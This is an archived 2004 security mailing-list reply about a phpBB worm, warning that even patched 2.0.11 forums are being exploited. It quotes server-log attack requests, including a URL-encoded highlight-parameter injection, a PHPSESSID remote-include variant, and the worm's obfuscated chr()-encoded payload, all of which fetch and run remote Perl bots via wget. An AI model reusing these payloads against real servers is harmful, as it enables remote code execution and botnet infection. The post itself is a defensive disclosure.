Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: phpBB Worm

from [Zeljko Brajdic] Network Security [Permanent Link]
Subject: Re: phpBB Worm
Date: 25 Dec 2004 11:25:43 -0000 
In-Reply-To: <Pine.LNX.4.61.0412241909320.23893@mailbox.prolocation.net>


Received: (qmail 11902 invoked from network); 24 Dec 2004 20:01:50 -0000
Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) 
(205.206.231.26)
 by mail.securityfocus.com with SMTP; 24 Dec 2004 20:01:50 -0000
Received: from lists2.securityfocus.com (lists2.securityfocus.com 
[205.206.231.20])
      by outgoing2.securityfocus.com (Postfix) with QMQP
      id CDA6D1436D1; Fri, 24 Dec 2004 13:06:19 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7567 invoked from network); 24 Dec 2004 11:06:25 -0000
X-Authentication-Warning: mailbox.prolocation.net: raymond owned process doing 
-bs
Date: Fri, 24 Dec 2004 19:12:22 +0100 (CET)
From: Raymond Dijkxhoorn <raymond@prolocation.net>
To: steve@uptime.org.uk
Cc: bugtraq@securityfocus.com
Subject: Re: phpBB Worm
In-Reply-To: <20041224161026.27228.qmail@www.securityfocus.com>
Message-ID: <Pine.LNX.4.61.0412241909320.23893@mailbox.prolocation.net>
References: <20041224161026.27228.qmail@www.securityfocus.com>
X-NCC-RegID: nl.multikabel
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed

Hi!


This assumes you're seeing GET-requests, but there are other ways
(e.g. POST) to exploit such code.



Whilst I understand your point, it should be noted that this 
vulnerability in phpBB is susceptible only to GET-based attacks: the 
vulnerable data is sourced from $HTTP_GET_VARS.


And it seems worse, we see even upgraded phpbb2 installs (2.0.11) 
succesfully and activly being exploited.

216.22.10.90 - - [24/Dec/2004:18:42:54 +0100] "GET 
/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 12758 "-" "LWP::Simple/5.803"
66.152.98.103 - - [24/Dec/2004:19:02:15 +0100] "GET 
/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 12758 "-" "LWP::Simple/5.79"
64.62.187.10 - - [24/Dec/2004:19:04:11 +0100] "GET 
/phpBB2/viewtopic.php?t=817&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 68131 "-" "LWP::Simple/5.63"
[24/Dec/2004:19:09:26 +0100] "GET 
/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 20767 "-" "LWP::Simple/5.803"
205.214.85.184 - - [24/Dec/2004:19:10:18 +0100] "GET 
/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 20875 "-" "LWP::Simple/5.802"

Loads of those, and all request the files from civa.org

This is on a patched phpbb2, so be aware!!


I can confirm a changed version of this attack also. It didn't use the phpBB 
highlight bug but something different, looks like somekind of PHPSESSID 
injecting:

GET 
/knjiga.php?id=8043/antikvarijati.php?PHPSESSID=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt
 HTTP/1.1" 200 20674 "-" "LWP::Simple/5.803"

*** This is on PHP 4.3.10, all phpBB2 are 2.0.11 ***

After sucsessfull wget-ing, one of files "worm.txt", is using google to find 
vulnerable phpBB2 (highlight bug) forums and use this:

$wb = 
'&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%2
52echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252ech
r(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)
%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252e
chr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(5
9)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%25
2echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr
(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)
%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252ec
hr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(10
5)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%25
2echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr
(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%
252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252ec
hr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(10
1)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%25
2echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr
(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%
252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252ec
hr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(11
2)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%25
2echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr
(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%
252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252ec
hr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(11
4)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%2
52e%2527';

That "decodes" into:

cd /tmp;wget www.visualcoders.net/spybot.txt;wget 
www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget 
www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl 
spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Full-Disclosure] new phpBB worm affects 2.0.11, Herman Sheremetyev
Next by Date:  CleanCache v2.19: False Sense of Security, WBG Links
Previous by Thread:  Re: [Full-Disclosure] new phpBB worm affects 2.0.11, Andrew Farmer
Next by Thread:  SUSE Security Announcement: various kernel problems (SUSE-SA:2004:044), Marcus Meissner
Indexes:  [Date] [Thread] [Top] [All Lists]